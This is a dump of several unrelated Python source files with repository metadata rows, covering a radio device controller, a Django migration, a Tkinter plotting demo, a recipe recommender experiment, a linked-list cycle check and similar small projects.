sta = self._send_pack(5)
self._radio.startListening ()
return sta
def set_off(self, addr, id):
self._tx_pack[0] = self.SET_STATE
self._tx_pack[1] = self.STATE_OFF
self._tx_pack[2] = id
self._slave_addr[0] = addr
self._radio.openWritingPipe(self._slave_addr)
self._radio.stopListening()
sta = self._send_pack(5)
self._radio.startListening ()
return sta
def lock_on(self, addr, id):
self._tx_pack[0] = self.LOCK_STATE
self._tx_pack[1] = self.STATE_ON
self._tx_pack[2] = id
self._slave_addr[0] = addr
self._radio.openWritingPipe(self._slave_addr)
self._radio.stopListening()
sta = self._send_pack(5)
self._radio.startListening ()
return sta
def lock_off(self, addr, id):
self._tx_pack[0] = self.LOCK_STATE
self._tx_pack[1] = self.STATE_OFF
self._tx_pack[2] = id
self._slave_addr[0] = addr
self._radio.openWritingPipe(self._slave_addr)
self._radio.stopListening()
sta = self._send_pack(5)
self._radio.startListening ()
return sta
def request(self, addr, id):
self._tx_pack[0] = self.REQUEST_STATE
self._tx_pack[1] = self.DEVICE_STATE
self._tx_pack[2] = id
self._slave_addr[0] = addr
self._radio.openWritingPipe(self._slave_addr)
self._radio.stopListening()
sta = self._send_pack(5)
self._radio.startListening ()
return sta
def get_data (self):
pipe = [0]
data = [False, 0x00, 0, False] # status, device_addr, device_id, device_state
if self._radio.available (pipe, False, 1):
self._radio.read (self._rx_pack)
if self._rx_pack [0] == self.DEVICE_STATE:
data [0] = True
data [1] = self._rx_pack [3]
data [2] = self._rx_pack [2]
data [3] = self._rx_pack [1] == self.STATE_ON
return data
def __del__ (self):
self._radio.end()
| [
"pys910@gmail.com"
] | pys910@gmail.com |
2c4fe8015968b8a78c7b2ea33ac5e21e01c82e6e | 75e99f1c3ba477a582a81aa22b8da0910c900134 | /bookstore/book/migrations/0003_auto_20180403_1401.py | f79af6ae4ee376ce12744797a99ed3339d1d8bb4 | [] | no_license | wuyumeng/bookstore | 1676f04f8f2d1a5fe8ff21bb3722c6def2459bc5 | ac6a58ebae98bfe2bed5fc6237cbca92c31c61de | refs/heads/master | 2020-03-09T09:05:49.883480 | 2018-04-09T02:46:03 | 2018-04-09T02:46:03 | 128,704,260 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 939 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import tinymce.models
class Migration(migrations.Migration):
dependencies = [
('book', '0002_auto_20180402_2344'),
]
operations = [
migrations.CreateModel(
name='HeriInfo',
fields=[
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True, serialize=False)),
('hcontent', tinymce.models.HTMLField()),
],
),
migrations.AlterField(
model_name='books',
name='type_id',
field=models.SmallIntegerField(verbose_name='商品种类', default=1, choices=[('ALGORITHMS', '数据结构与算法'), ('OPERATINGSYSTEM', '操作系统'), ('DATABASE', '数据库'), ('JAVASCRIPT', 'javascript'), ('MACHINELEARNING', '机器学习'), ('PYTHON', 'python')]),
),
]
| [
"18732429547@163.com"
] | 18732429547@163.com |
122af83da8a2175b1e1c714e728d2bc9051068ae | 46a5338c5979c54e335af3d5a0523d5325845a0d | /python/fishsey/template/_tkinter.py | a7b44a26e02ff0b1ebcf2fc20be1522197305034 | [] | no_license | fishsey/code | 658284367b8435fa233a473341b90d746330a873 | b4275042e18ee02eb29ee285df7dce6d4d31a0c4 | refs/heads/master | 2021-07-11T18:57:11.052981 | 2017-10-06T11:15:35 | 2017-10-06T11:15:35 | 105,975,719 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,393 | py | # -*- coding: utf-8 -*-
"""
Created on Tue Dec 06 21:07:30 2016
@author: fishsey
"""
from numpy import *
from Tkinter import *
import matplotlib
matplotlib.use('TkAgg')
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
from matplotlib.figure import Figure
def reDraw(x, y):
reDraw.f.clf() # clear the figure
reDraw.a = reDraw.f.add_subplot(111)
reDraw.a.plot(x, y, linewidth=2.0) #use plot for yHat
reDraw.canvas.show()
def drawNewTree():
import numpy as np
x = np.arange(10)
y = x * 2 + 3
reDraw(x, y)
root=Tk()
#matplotlib 画布
reDraw.f = Figure(figsize=(5,4), dpi=100) #create canvas
reDraw.canvas = FigureCanvasTkAgg(reDraw.f, master=root)
reDraw.canvas.show()
reDraw.canvas.get_tk_widget().grid(row=0, columnspan=3)
#label1
Label(root, text="tolN").grid(row=1, column=0)
tolNentry = Entry(root)
tolNentry.grid(row=1, column=1)
tolNentry.insert(0,'10')
#label2
Label(root, text="tolS").grid(row=2, column=0)
tolSentry = Entry(root)
tolSentry.grid(row=2, column=1)
tolSentry.insert(0,'1.0')
#按钮
Button(root, text="ReDraw", command=drawNewTree).grid(row=3, column=0, columnspan=1)
#复选框
chkBtnVar = IntVar()
chkBtn = Checkbutton(root, text="Model Tree", variable = chkBtnVar)
chkBtn.grid(row=3, column=1, columnspan=2)
root.wm_resizable(800, 400)
#root.wm_state('zoomed') #全屏
root.mainloop() | [
"ally1984aikx@gmail.com"
] | ally1984aikx@gmail.com |
228838743a4a17ff71de267f94269836b84c585b | acb8e84e3b9c987fcab341f799f41d5a5ec4d587 | /langs/0/bak.py | 12452944e2d8adaa5868f756dd6e5ad813124986 | [] | no_license | G4te-Keep3r/HowdyHackers | 46bfad63eafe5ac515da363e1c75fa6f4b9bca32 | fb6d391aaecb60ab5c4650d4ae2ddd599fd85db2 | refs/heads/master | 2020-08-01T12:08:10.782018 | 2016-11-13T20:45:50 | 2016-11-13T20:45:50 | 73,624,224 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 486 | py | import sys
def printFunction(lineRemaining):
if lineRemaining[0] == '"' and lineRemaining[-1] == '"':
if len(lineRemaining) > 2:
#data to print
lineRemaining = lineRemaining[1:-1]
print ' '.join(lineRemaining)
else:
print
def main(fileName):
with open(fileName) as f:
for line in f:
data = line.split()
if data[0] == 'bAK':
printFunction(data[1:])
else:
print 'ERROR'
return
if __name__ == '__main__':
main(sys.argv[1]) | [
"juliettaylorswift@gmail.com"
] | juliettaylorswift@gmail.com |
ef78a74713a122e3ad23d10048cdc826d0c26434 | b94f639d4c5a499f578d18762809cd91c7f7e934 | /foodsubstitution/views/__init__.py | f05b5e1fd27c98ea040bc543cb14dbe68b684d0b | [] | no_license | MCiret/P5_PurBeurre-Food-Substitution_DA-Python | d55facb48bf75baa532b0398f9cecd2a00570c50 | 038dbe9b7735bcf512c612de91487c7ea769c9b1 | refs/heads/master | 2023-04-01T04:06:23.500965 | 2021-04-07T15:29:30 | 2021-04-07T15:29:30 | 341,870,276 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 289 | py | from .data_init_view import DataInitView
from .main_menu_view import MainMenuView
from .cat_view import CatView
from .food_view import FoodView
from .substitution_view import SubstitutionView
from .bookmarking_view import BookmarkingView
from .read_bookmarks_view import ReadBookmarksView
| [
"ciret.m@gmail.com"
] | ciret.m@gmail.com |
942a6a475150a440d2d71c36555b3b9649d6eb26 | ad0857eaba945c75e705594a53c40dbdd40467fe | /baekjoon/python/dial_5622.py | 2f52057085043af2b8abff6075f383071902aa85 | [
"MIT"
] | permissive | yskang/AlgorithmPractice | c9964d463fbd0d61edce5ba8b45767785b0b5e17 | 3efa96710e97c8740d6fef69e4afe7a23bfca05f | refs/heads/master | 2023-05-25T13:51:11.165687 | 2023-05-19T07:42:56 | 2023-05-19T07:42:56 | 67,045,852 | 0 | 0 | null | 2021-06-20T02:42:27 | 2016-08-31T14:40:10 | Python | UTF-8 | Python | false | false | 494 | py | # https://www.acmicpc.net/problem/5622
def dial_time(digit_string):
digit_dict = {"A": 2, "B": 2, "C": 2, "D": 3, "E": 3, "F": 3, "G": 4, "H": 4, "I": 4, "J": 5, "K": 5, "L": 5,
"M": 6, "N": 6, "O": 6, "P": 7, "Q": 7, "R": 7, "S": 7, "T": 8, "U": 8, "V": 8, "W": 9, "X": 9,
"Y": 9, "Z": 9}
time = 0
for d in digit_string:
time += (digit_dict[d] + 1)
return time
if __name__ == "__main__":
print(dial_time(input()))
| [
"yongsung.kang@gmail.com"
] | yongsung.kang@gmail.com |
e3b8499d35ca0953884bd83aaecd543105bc25fd | c07ae35b94c770cdfde26a3084ca13560a29113b | /8 kyu/Convert a string to an array.py | 6ea6f5f958966bab3497f1146c97a3649ccefce8 | [] | no_license | Djusk8/CodeWars | 2f860efdf9c93e02170a61bd3345c1a6c57b85f0 | 75cdaaab3f9152032aeaa05d06ef67599aff710b | refs/heads/master | 2021-06-24T09:33:33.393342 | 2021-03-22T06:19:56 | 2021-03-22T06:19:56 | 208,574,077 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,666 | py | # ------------ KATA DESCRIPTION ------------
"""
8 kyu - Convert a string to an array
Write a function to split a string and convert it into an array of words. For example:
"Robin Singh" ==> ["Robin", "Singh"]
"I love arrays they are my favorite" ==> ["I", "love", "arrays", "they", "are", "my", "favorite"]
"""
# --------------- SOLUTION ---------------
import codewars_test as Test
# while s.split(" ") is the easiest solution with build0in functions, I want to get some practice and write my own func
# to split a string
def string_to_array(s):
result = []
tmp = ""
for ch in s:
if ch == " ":
result.append(tmp)
tmp = ""
else:
tmp += ch
result.append(tmp) # add to result the last word in string
return result
# --------------- TEST CASES ---------------
Test.describe("Basic tests")
Test.assert_equals(string_to_array("Robin Singh"), ["Robin", "Singh"])
Test.assert_equals(string_to_array("CodeWars"), ["CodeWars"])
Test.assert_equals(string_to_array("I love arrays they are my favorite"), ["I", "love", "arrays", "they", "are", "my", "favorite"])
Test.assert_equals(string_to_array("1 2 3"), ["1", "2", "3"])
Test.assert_equals(string_to_array(""), [""])
Test.describe("Random tests")
from random import randint
sol=lambda s: s.split(" ")
base="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
for _ in range(40):
s=" ".join(["".join([base[randint(0,len(base)-1)] for q in range(randint(1,20))]) for k in range(randint(1,15))])
Test.it("Testing for "+repr(s))
Test.assert_equals(string_to_array(s),sol(s),"It should work for random inputs too") | [
"djusk8@gmail.com"
] | djusk8@gmail.com |
83ded1637f014ddd7d1d74a9b794caa77f7d598e | affd224383562562739623c7d63303c12efce568 | /source/CreateHMMparameter/CreateHMMparameter/CreateHMMparameter.py | aa79846373f87c422e7971ce118924dc0fcd2168 | [] | no_license | shiori-yokota/DataAnalysis | 24156474229969d68cdf296df353e538e8066f25 | 938c26e09c9bef5146af911a0c9be2d2ccceae66 | refs/heads/master | 2020-04-07T05:03:43.283524 | 2018-03-07T05:22:51 | 2018-03-07T05:22:51 | 124,183,268 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,014 | py | # -*- coding: utf-8 -*- #
import glob
from hmmlearn import hmm
import numpy as np
from sklearn.mixture import GMM
from sklearn.externals import joblib, joblib
import sklearn
EvmPath = "..\\..\\..\\"
compornents = 8 ## State number of HMM
mix = 10 ## Mixture number of GMM
LearningData = []
#### LEARNING ####
for motionID in glob.glob(EvmPath + 'MotionData\\Learning\\*'):
print("Motion id: " + str(motionID))
models = []
'''
GMMHMM(algorithm='viterbi', covariance_type='diag', covars_prior=0.01,
init_params='stmcw', n_components=5, n_iter=10, n_mix=1,
params='stmcw', random_state=None, startprob_prior=1.0, tol=0.01,
transmat_prior=1.0, verbose=False)
init_params : string, optional
Controls which parameters are initialized prior to training. Can
contain any combination of 's' for startprob, 't' for transmat, 'm'
for means, 'c' for covars, and 'w' for GMM mixing weights.
Defaults to all parameters.
params : string, optional
Controls which parameters are updated in the training process. Can
contain any combination of 's' for startprob, 't' for transmat, 'm' for
means, and 'c' for covars, and 'w' for GMM mixing weights.
Defaults to all parameters.
'''
model = hmm.GMMHMM(n_components = compornents, n_iter = 100, n_mix = mix,
verbose = True, init_params = 'cmw', params = 'mctw', covariance_type = 'full')
transmat = np.zeros((compornents, compornents))
## Left-to-right: each state is connected to itself and its direct successor.
## Correct left-to-right model
for i in range(compornents):
if i == compornents - 1:
transmat[i, i] = 1.0
else:
transmat[i, i] = transmat[i, i + 1] = 0.5
print(transmat)
## Always start in first state
startprob = np.zeros(compornents)
startprob[0] = 1.0
model.transmat_ = transmat
model.startprob_ = startprob
gmms = []
for i in range(0, compornents):
gmms.append(sklearn.mixture.GMM())
model.gmms_ = gmms
## motion data ##
motions = []
lengths = []
for file in glob.glob(motionID+'\\*.dat'):
print(file)
motion = []
escapes = []
for line in open(file): ## select motion
if '0.0,11,0' in line:
print('header: ' + str(line))
headerName = line[:-1].split('\t')
for i, item in enumerate(headerName):
if 'Avatar' in item:
escapes.append(i)
else:
data = line[:-1].split('\t')
# print('data: '+str(data))
tmpPose = []
for i, item in enumerate(data):
if i in escapes:
# print(i, item)
tmpItem = item[:-1].split(',')
for j in tmpItem:
tmpPose.append(float(j))
motion.append(tmpPose)
motions.append(motion)
lengths.append(len(motion))
## CREATE HMM PARAMETER ##
X = np.concatenate(motions)
model.fit(X, lengths)
print(model.transmat_)
for line in model.transmat_:
sum = 0.0
for one in line:
sum += one
print('sum: ' + str(format(sum, '.15f')))
if round(sum, 4) != 1.0:
input('check sum error >>> ')
models.append(model)
joblib.dump(model, motionID + '\\' + motionID[-1:] + '.pkl')
| [
"e1252225@gmail.com"
] | e1252225@gmail.com |
cbeded83233e21772af0637b2dcdb72d5adbec0e | 73ecfa0be6ae649c3eb1847436c9feeb96895b72 | /es_python/basi.py | a2987c233d46812f5ce14c097544147800515ac6 | [] | no_license | MellanoMatteo/Sistemi | b4146bfe723071bf01a2b3a8eaea355928f0775c | dfcee7b8e0bcc0bd0bfe1c8590918da9e0850284 | refs/heads/main | 2023-03-27T03:50:35.767954 | 2021-03-26T08:36:01 | 2021-03-26T08:36:01 | 317,488,141 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,446 | py |
lista = [1, 2, 4, "ciao"]
lista.append("aggiungo in coda un altro elemento")
print(lista[0:4]) #stampo gli elementi della lista dal 0 al 3
print(lista[3:]) #stampo i valori della lista dal numero inserito fino alla sua fine (discorso uguale ma inverso per stampare dall'inizio fino ad un certo punto, che sarà però escluso)
stringa = "matteomellano"
#discorso delle liste uguale per le strighe, e sarà anche uguale per le iterazioni
print(stringa[0:4])
print(stringa[3:])
#print(lista) -> stampa il valroe della lista
for elemento in lista:
print("ciao1")
#print(elemento) ->stampa il valroe della lista, uno per volta
for indice, el in enumerate(lista):
print("ciao2")
#indice è il numero della elemento a cui siamo arrivati, -1
#el è l'elemento della lista nel determinato indice a cui siamo arrivati
#print(el) -> stampa il valore della lista a quel determinato indice
#print(lista[indice]) == print8(el)
for indice in range(0 , len(lista)):
print("ciao3")
#range identifica un campo in cui possiamo mouverci
#len misura la lunghezza della lista
#indice è il numero corrispondente alla cella a cui siamo arrivati
#print(lista[indice]) -> stampa il valore della lista a quel determinato indice
dizionario = {1:"Antonelli", 2:"Becchis", 3:"Bianco", 4:"Bongiovanni", 20:"Piumatto"}
for elemen in dizionario:
print(dizionario[elemen])
| [
"noreply@github.com"
] | noreply@github.com |
e8063309a45432e5690789a729c9e10f56504335 | c5828337255cb038a5c625ac28dd6805631abc06 | /src/accTest/exceptions.py | bc72ccea49aab004b9dbc08e57f32b49f78a056a | [] | no_license | Wei-N-Ning/accTest | b28d06e5e19558287afd815fbd0429219e9acea3 | a37a9679cf5f58413158e75a789eeb6f3d4d159c | refs/heads/master | 2021-03-29T11:04:44.280390 | 2017-09-12T13:01:00 | 2017-09-12T13:01:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,100 | py |
class MissingProperty(Exception):
def __init__(self, name):
super(MissingProperty, self).__init__(
'Property: {} does not exist on fixture'.format(name)
)
class BrokenTask(Exception):
def __init__(self, task):
super(Exception, self).__init__(
'Task {} is not associated with any fixture (orphaned task).'.format(task.fullName())
)
class CanNotLoadTask(Exception):
def __init__(self, filePath, dslTaskName, msg=''):
super(CanNotLoadTask, self).__init__(
'Can not load task!\nSearch path: {}, Task: {}\nReason: {}'.format(filePath, dslTaskName, msg)
)
class MalformedTaskName(Exception):
def __init__(self, dslTaskName):
super(MalformedTaskName, self).__init__(
'Only name that contains $TYPE or $TYPE:$INSTANCE is supported! Got: {}'.format(dslTaskName)
)
class InvalidDslFilePath(Exception):
def __init__(self, dslFilePath):
super(InvalidDslFilePath, self).__init__(
'Invalid dsl document file path: {}'.format(dslFilePath)
) | [
"macgnw@gmail.com"
] | macgnw@gmail.com |
18952228b994c5076832cba456a033cd3d575e08 | 8d7fa86fec4e60c8fb7dc05729c00cbb5172db71 | /src/utils/expriments.py | d58d64ab33503e3b943cd70c577fe376ded86cd0 | [] | no_license | alexsanjoseph/customized-recipe | 4abc33de325b41a53541b634ac2d3a721776624d | d91ee3aa355405514392e537dfcb097c1364b3d1 | refs/heads/master | 2023-04-26T08:53:31.926166 | 2021-05-25T15:32:31 | 2021-05-25T15:32:31 | 370,742,445 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,390 | py | import pandas as pd
import numpy as np
import recmetrics
from sklearn.metrics.pairwise import cosine_similarity
from sklearn.preprocessing import LabelEncoder
from sklearn.preprocessing import OneHotEncoder
recipe_data = pd.read_csv('../datasets/epirecipes/user_profile.csv')
test_user_data = pd.read_csv('../datasets/epirecipes/test_useers.csv')
catalog = recipe_data.loc[:, 'recipeTitle'].unique().tolist()
le = LabelEncoder()
recipe_data['gender'] = le.fit_transform(recipe_data['gender'])
recipe_data['goal'] = le.fit_transform(recipe_data['goal'])
recipe_data['userId'] = le.fit_transform(recipe_data['userId'])
test_user_data['gender'] = le.fit_transform(test_user_data['gender'])
test_user_data['goal'] = le.fit_transform(test_user_data['goal'])
def find_recommendation(usserId, age, ggndeer, goall):
test_user = pd.DataFrame(
{'userId': usserId,
'age': age,
'gender': ggndeer,
'goal': goall}, index=[0])
top_10_similar_users_indices = np.argsort(-cosine_similarity(test_user.loc[:, ['age', 'gender','goal']],
recipe_data.loc[:, ['age', 'gender','goal']])[0])[:10]
f_l = list()
print(top_10_similar_users_indices)
for i in top_10_similar_users_indices:
if(recipe_data.loc[i,:].rating>=3):
#print(recipe_data.loc[i,'recipeTitle'])
f_l.append(recipe_data.loc[i,'recipeTitle'])
return f_l[:5]
res_diict = dict()
resllist = list()
for index, row in test_user_data.iterrows():
recommmendationlist = find_recommendation(row['userId'], row['age'], row['gender'], row['goal'])
res_diict[row['userId']] = recommmendationlist
resllist.append(recommmendationlist)
print(resllist)
length = max(map(len, resllist))
y=np.array([xi+['']*(length-len(xi)) for xi in resllist])
onehot_encoder = OneHotEncoder(handle_unknown='ignore')
onehot_encoder.fit(y)
onehotlabels = onehot_encoder.transform(y).toarray()
ssimilarity_array= cosine_similarity(onehotlabels)
ssimilarity_array_numpy_arr = np.matrix(ssimilarity_array)
upper_diagoonal = np.triu(ssimilarity_array_numpy_arr, 1)
upper_diagoonal_indiices = np.triu_indices_from(ssimilarity_array_numpy_arr, 1)
print(upper_diagoonal)
ltri = np.tril(ssimilarity_array_numpy_arr, -1)
ltri = ltri[np.nonzero(ltri)]
print("presonalization score: " + str(recmetrics.personalization(y))) | [
"alexsanjoseph@gmail.com"
] | alexsanjoseph@gmail.com |
e26e39f00e77ed06034df934564072590fdff2a2 | 5fff8b7eb7d83d3923738970c722c29576d8796a | /debuging.py | 0b043efe604d59591f80965eeea54b01b29723a1 | [] | no_license | honglanfcb/NLPCC_bert | 9185dd9a749f6b42318ba776b555f3024a16cb61 | 4a9bd0360fb0aa25428384f9f664e70c7158d9a6 | refs/heads/master | 2020-11-26T22:57:11.319050 | 2019-12-22T09:14:15 | 2019-12-22T09:14:15 | 229,223,921 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 83 | py | with open("D:/program/git/Steve/NLPCC_bert/aa.txt", 'w') as f:
f.write("debug") | [
"w653771147@gmail.com"
] | w653771147@gmail.com |
8a8d29142bd33b8d6b538cb5bef48f3cbdb18df6 | fd0ab0f840ead868ea7b06003a76422665970903 | /16IT112_IT352_P2.py | 889f70498b2eabd2f6c4b33172152743513ba0ec | [] | no_license | divyamsm/6thsem | 593c14ed63af8791b11d9783ad655a5363351c65 | aee13df91919818a8efaee84140b04b8809a135a | refs/heads/master | 2020-04-15T21:13:45.515170 | 2019-01-30T10:27:37 | 2019-01-30T10:27:37 | 165,025,436 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,582 | py | '''Read Input'''
from numpy import binary_repr
entry = str(input("Give the string "))
if len(entry)<8:
print("Error, length less than 8")
exit()
usercode = str(input("Enter code 1 (first 8 chars) or 2 (last 8 chars) "))
key_stage_1 = []
if usercode == '1':
for i in range(8):
key_stage_1.append(ord(entry[i]))
elif usercode == '2':
entry = entry[-8:]
for i in range(8):
key_stage_1.append(ord(entry[i]))
else:
print("Error, invalid code")
exit()
'''ASCII TO BINARY'''
for i in range(len(key_stage_1)):
key_stage_1[i] = binary_repr(key_stage_1[i],width = 8)
'''PC-1'''
PC_1_table = [57, 49, 41, 33, 25, 17, 9,
1, 58, 50, 42, 34, 26, 18,
10, 2, 59, 51, 43, 35, 27,
19, 11, 3, 60, 52, 44, 36,
63, 55, 47, 39, 31, 23, 15,
7, 62, 54, 46, 38, 30, 22,
14, 6, 61, 53, 45, 37, 29,
21, 13, 5, 28, 20, 12, 4]
'''convert the 64 bit values to 56 bit values and subtract 1 for index values'''
for i in range(len(PC_1_table)):
PC_1_table[i] -= 1
key_stage_1 = ''.join(key_stage_1)
key_stage_2 = [2 for i in range(56)]
'''replace values...perform pc1 operation'''
for i in range(56):
key_stage_2[i] = key_stage_1[PC_1_table[i]]
key_stage_2 = ''.join(key_stage_2)
'''PC2 table conversion'''
PC_2_table = [14, 17, 11, 24, 1, 5, 3, 28,
15, 6, 21, 10, 23, 19, 12, 4,
26, 8, 16, 7, 27, 20, 13, 2,
41, 52, 31, 37, 47, 55, 30, 40,
51, 45, 33, 48, 44, 49, 39, 56,
34, 53, 46, 42, 50, 36, 29, 32]
for i in range(len(PC_2_table)):
PC_2_table[i] -=1
def leftshift(test):
tempc = test[0]
test = test[1:]
test += tempc
return test
def round(no,key,pc2,keygroup):
'''left shift'''
lkey = key[:28]
rkey = key[28:]
# print(lkey)
# print(rkey)
if no not in (1,2,9,16):
lkey = leftshift(lkey)
rkey = leftshift(rkey)
lkey = leftshift(lkey)
rkey = leftshift(rkey)
newkey = lkey+rkey
keyop = ['' for _ in range(48)]
for i in range(48):
keyop[i] = newkey[PC_2_table[i]]
keygroup.append(''.join(keyop))
return newkey
'''EXECUTION'''
keygroup = []
prevkey = key_stage_2
for i in range(1,17):
currentkey = round(i,prevkey,PC_2_table,keygroup)
prevkey = currentkey
def tohex(bits):
ans = ''
while len(bits)>0:
current = bits[:4]
bits = bits[4:]
ans += hex(int(current,2))[2:]
return ans
for i in range(len(keygroup)):
print('Round ',i,' key is : ',keygroup[i] ,' in hex : ',tohex(keygroup[i]))
| [
"noreply@github.com"
] | noreply@github.com |
2f0a89a7e8d1b21ac8e5b4f19526282cf6b7c983 | 6f0c99a5959b69f3d44c4232806f72e90777416c | /SCIENTIFIC EXPEDITION/CommonWords.py | 1e8edc6b9a05f48f9e57178a4cf901e2a12b252b | [] | no_license | Marshall00/CheckiO-tasks-solutions | 72cb270ed2f375b0e0c3a214bfdd4e81d72eec71 | ff4bd786b94e3e24509c6507f48d25f70c2f83cf | refs/heads/master | 2020-04-16T12:01:04.809750 | 2019-01-25T21:24:57 | 2019-01-25T21:24:57 | 165,561,602 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 562 | py | def checkio(first, second):
lst=[] #In this list we will keep common words for both sets
x=first.split(',') #Create list of all words in x string
y=second.split(',')#Create list of all words in y string
x_set=set(x) #Create set based on x list
y_set=set(y) #Create set based on y list
s=x_set.intersection(y_set) #set of all common words
for element in s:
lst.append(element) #list of all common words created based on s-set
return ','.join(sorted(lst))#Create alpah. ordered string with all words separated by comma
| [
"noreply@github.com"
] | noreply@github.com |
f5d77757b660bda4bd0936356a8d6d7361827530 | a81f0c4ceeb121c61c40eec52c97515110545f69 | /controllers/utils.py | 36fd3fc9b4946eaa8a8a3ae3d0b5f58ecc377eed | [] | no_license | msergeyk/yandex_backend | 11de04aa73542842a144b41f5f4a0d79f26ee5c2 | dd3fabe2df5f829a31b9bf19996f6ac6c0e28cce | refs/heads/main | 2023-03-31T03:25:01.866756 | 2021-03-29T20:46:35 | 2021-03-29T20:46:35 | 352,032,449 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 687 | py | from datetime import datetime
from intervals.exc import IllegalArgument
def process_str(s):
return datetime.strptime(s, "%H:%M").strftime("%Y-%m-%d %H:%M")
def process_str_list(str_list):
return [
f"[{process_str(s.split('-')[0])}, " f"{process_str(s.split('-')[1])}]"
for s in str_list
]
def process_dti(x):
return str(x)[12:17] + "-" + str(x)[33:38]
def intersect(seg1, seg2):
flag = False
for x in seg1:
if flag is True:
break
for y in seg2:
try:
x & y
flag = True
break
except IllegalArgument:
continue
return flag
| [
"msergey1996@mail.ru"
] | msergey1996@mail.ru |
dbe21cb50ad0b0cdc32dd28a4cdcb0ed69808a08 | 8ade5c2f29e41bc79eb917c217e0adc1057db87d | /src/features/gaia-sdss/consolidate.py | 5f0609d82640146c4acd9942cdbdacafc0342d72 | [
"MIT"
] | permissive | jastudillo1/A-Reinforcement-Learning-based-Follow-Up-Framework | 963c13dc0e4feccf68c50025f14914e31e421012 | 930fa3089230fdaec44e99d1d36e7970824708fd | refs/heads/master | 2023-04-10T19:51:40.997654 | 2022-11-17T01:39:11 | 2022-11-17T01:39:11 | 329,093,101 | 0 | 0 | null | 2022-11-17T01:39:12 | 2021-01-12T19:38:59 | Jupyter Notebook | UTF-8 | Python | false | false | 1,543 | py | import numpy as np
import pandas as pd
def append_sdss_id(xmatch):
plate = [str(p).zfill(4) for p in xmatch.PLATE_sdss]
fiber = [str(f).zfill(4) for f in xmatch.FIBERID_sdss]
mjd = xmatch.MJD_sdss
ids = ['spec-{}-{}-{}.fits'.format(p, m, f) for p,m,f in zip(plate, mjd, fiber)]
xmatch['id_sdss'] = ids
return xmatch
if __name__=='__main__':
ctlg_dir = '../../../data/catalogues'
ftrs_dir = '../../../data/features'
spec_path = f'{ftrs_dir}/gaia-sdss/features_spectra.csv'
rnn_path = f'{ftrs_dir}/gaia-sdss/features_rnn.csv'
color_path = f'{ftrs_dir}/gaia-sdss/features_color.csv'
xmatch_path = f'{ctlg_dir}/gaia-sdss/cross-match-labels.csv'
save_path = f'{ftrs_dir}/gaia-sdss/features.csv'
ftrs_spectra = pd.read_csv(spec_path)
ftrs_rnn = pd.read_csv(rnn_path)
ftrs_color = pd.read_csv(color_path)
xmatch = pd.read_csv(xmatch_path)
xmatch = append_sdss_id(xmatch)
xmatch = xmatch[['source_id_gaia', 'id_sdss', 'best_class_name_gaia']]
xmatch = xmatch.rename(columns={'best_class_name_gaia': 'label', 'source_id_gaia': 'id_gaia'})
xmatch = xmatch.merge(ftrs_spectra, on='id_sdss', how='inner')
xmatch = xmatch.merge(ftrs_rnn, on='id_gaia', how='inner')
xmatch = xmatch.merge(ftrs_color, on='id_gaia', how='inner')
features_cols = set(xmatch.columns) - set(['id_gaia', 'id_sdss', 'label'])
reorder = ['id_gaia', 'id_sdss', 'label'] + sorted(list(features_cols))
xmatch = xmatch[reorder]
xmatch.to_csv(save_path, index=False) | [
"jastudillo@g.harvard.edu"
] | jastudillo@g.harvard.edu |
7519b3756f10f14a5efbed78d21cd03b01e3570b | 0a85e9ecb51c89110794aeb399fc3ccc0bff8c43 | /Udacity/1. Data Structures/2. Linked List/detecting_loops.py | 7dde5625ea99184e444c23e219dd8ab70ca841bc | [] | no_license | jordan-carson/Data_Structures_Algos | 6d246cd187e3c3e36763f1eedc535ae1b95c0b18 | 452bb766607963e5ab9e39a354a24ebb26ebaaf5 | refs/heads/master | 2020-12-02T23:19:11.315890 | 2020-09-15T01:23:29 | 2020-09-15T01:23:29 | 231,147,094 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,569 | py | class Node:
def __init__(self, value):
self.value = value
self.next = None
class LinkedList:
def __init__(self, init_list=None):
self.head = None
if init_list:
for value in init_list:
self.append(value)
def append(self, value):
if self.head is None:
self.head = Node(value)
return
# Move to the tail (the last node)
node = self.head
while node.next:
node = node.next
node.next = Node(value)
return
def iscircular(linked_list):
if linked_list.head is None:
return False
slow = linked_list.head
fast = linked_list.head
while slow and fast and fast.next:
fast = fast.next.next
slow = slow.next
if fast == slow:
return True
return False
if __name__ == '__main__':
list_with_loop = LinkedList([2, -1, 3, 0, 5])
# Creating a loop where the last node points back to the second node
loop_start = list_with_loop.head.next
node = list_with_loop.head
while node.next:
node = node.next
node.next = loop_start
small_loop = LinkedList([0])
small_loop.head.next = small_loop.head
print ("Pass" if iscircular(list_with_loop) else "Fail")
print ("Pass" if not iscircular(LinkedList([-4, 7, 2, 5, -1])) else "Fail")
print ("Pass" if not iscircular(LinkedList([1])) else "Fail")
print ("Pass" if iscircular(small_loop) else "Fail")
print ("Pass" if not iscircular(LinkedList([])) else "Fail")
| [
"jordanlouiscarson@gmail.com"
] | jordanlouiscarson@gmail.com |
acc99a53304ab28458e6f36b7b8ef9b70fff4dda | b2de663ffa58dbb9189e61ca83097b1f5a1e070f | /4_ml_exploration_combined_training_new_features_new_clf.py | 2c7deb2e553671fde8f7b625b67898363650134e | [] | no_license | benbenboben/test | 9c456b19e47b270d4ec3558220731cae324ef4d8 | 9bd6a7a820953754cae89be2acf09e79558a2fcf | refs/heads/master | 2021-09-03T23:46:18.488394 | 2018-01-12T23:19:42 | 2018-01-12T23:19:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,008 | py |
# coding: utf-8
# # Table of Contents
